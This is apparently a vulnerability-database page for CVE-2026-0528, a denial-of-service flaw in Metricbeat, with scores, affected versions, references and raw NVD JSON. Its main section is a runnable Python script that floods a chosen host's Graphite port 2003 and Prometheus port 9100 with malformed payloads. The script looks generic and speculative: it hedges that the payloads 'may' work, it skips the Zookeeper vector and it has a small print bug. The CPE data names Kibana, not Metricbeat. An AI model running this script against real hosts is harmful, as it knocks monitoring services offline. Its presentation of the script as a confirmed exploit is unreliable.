CVE-2026-0528

Description

Improper Validation of Array Index (CWE-129) exists in Metricbeat can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed payloads sent to the Graphite server metricset or Zookeeper server metricset. Additionally, Improper Input Validation (CWE-20) exists in the Prometheus helper module that can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed metric data.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE

Metricbeat 8.x < 8.19.10

Metricbeat 9.x < 9.1.10

Metricbeat 9.x < 9.2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-0528 PoC - Metricbeat Graphite metricset DoS
Note: This PoC is for educational and security testing purposes only.
"""

import socket
import struct
import time

def send_malformed_graphite_payload(host, port=2003):
    """
    Send malformed Graphite metric data to trigger array index validation issue
    """
    # Malformed payloads that may cause parsing issues
    payloads = [
        # Payload 1: Invalid metric name with null bytes
        b'\x00metric.test 1.0 ' + str(int(time.time())).encode() + b'\n',
        # Payload 2: Extremely long metric name
        b'a' * 10000 + b'.test 1.0 ' + str(int(time.time())).encode() + b'\n',
        # Payload 3: Malformed value
        b'metric.test \x80\xff\xfe ' + str(int(time.time())).encode() + b'\n',
        # Payload 4: Invalid timestamp
        b'metric.test 1.0 -99999999999999999999999999999999999999\n',
        # Payload 5: Format string like characters
        b'%s%s%s.test 1.0 ' + str(int(time.time())).encode() + b'\n',
    ]
    
    for i, payload in enumerate(payloads):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((host, port))
            sock.send(payload)
            print(f"[+] Payload {i+1} sent to {host}:{port}")
            sock.close()
            time.sleep(0.5)
        except Exception as e:
            print(f"[-] Error sending payload {i+1}: {e}")

def send_malformed_prometheus_metrics(host, port=9100):
    """
    Send malformed Prometheus format metrics to trigger input validation issue
    """
    malicious_metrics = [
        # Metric with control characters
        b'metric_name\x00{test} 1.0\n',
        # Metric with invalid UTF-8 sequence
        b'metric_test \xc0\x80 1234567890\n',
        # Metric with excessive label count
        b'metric_test{' + b'a='*1000 + b'b="value"} 1.0\n',
        # Metric with very long value
        b'metric_test ' + b'9' * 100000 + b'\n',
    ]
    
    for i, metric in enumerate(malicious_metrics):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((host, port))
            sock.send(b'POST /metrics HTTP/1.1\r\n')
            sock.send(b'Host: ' + host.encode() + b'\r\n')
            sock.send(b'Content-Type: text/plain\r\n')
            sock.send(b'Content-Length: ' + str(len(metric)).encode() + b'\r\n')
            sock.send(b'\r\n')
            sock.send(metric)
            print(f"[+] Prometheus payload {i+1} sent")
            sock.close()
            time.sleep(0.5)
        except Exception as e:
            print(f"[-] Error sending Prometheus payload {i+1}: {e}")

if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_host>")
        print("Example: python3 {sys.argv[0]} 192.168.1.100")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Starting CVE-2026-0528 PoC against {target}")
    send_malformed_graphite_payload(target, 2003)
    send_malformed_prometheus_metrics(target, 9100)
    print("[*] PoC execution completed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0528
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0528
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0528/
[4] VulDB https://vuldb.com/cve/CVE-2026-0528
[5] https://discuss.elastic.co/t/metricbeat-8-19-10-9-1-10-9-2-4-security-update-esa-2026-01/384519

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0528", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:50.647", "lastModified": "2026-01-22T19:57:29.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Validation of Array Index (CWE-129) exists in Metricbeat can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed payloads sent to the Graphite server metricset or Zookeeper server metricset. Additionally, Improper Input Validation (CWE-20) exists in the Prometheus helper module that can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed metric data."}, {"lang": "es", "value": "La Validación Incorrecta de Índice de Array (CWE-129) existe en Metricbeat y puede permitir a un atacante causar una denegación de servicio a través de la Manipulación de Datos de Entrada (CAPEC-153) mediante cargas útiles malformadas y especialmente diseñadas enviadas al metricset del servidor Graphite o al metricset del servidor Zookeeper. Además, la Validación de Entrada Incorrecta (CWE-20) existe en el módulo auxiliar de Prometheus que puede permitir a un atacante causar una denegación de servicio a través de la Manipulación de Datos de Entrada (CAPEC-153) mediante datos de métricas malformados y especialmente diseñados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.17.29", "matchCriteriaId": "5DE7E670-76C6-4E95-BDD0-9322E42929BB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.10", "matchCriteriaId": "8707CF69-9922-490B-B64F-38F2D31E2CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.10", "matchCriteriaId": "FC3281ED-A331-43DC-9705-80A3FA3E6C75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.4", "matchCriteriaId": "8BF9D6AE-B07F-4516-A684-60B02BF731A0"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/metricbeat-8-19-10-9-1-10-9-2-4-security-update-esa-2026-01/384519", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}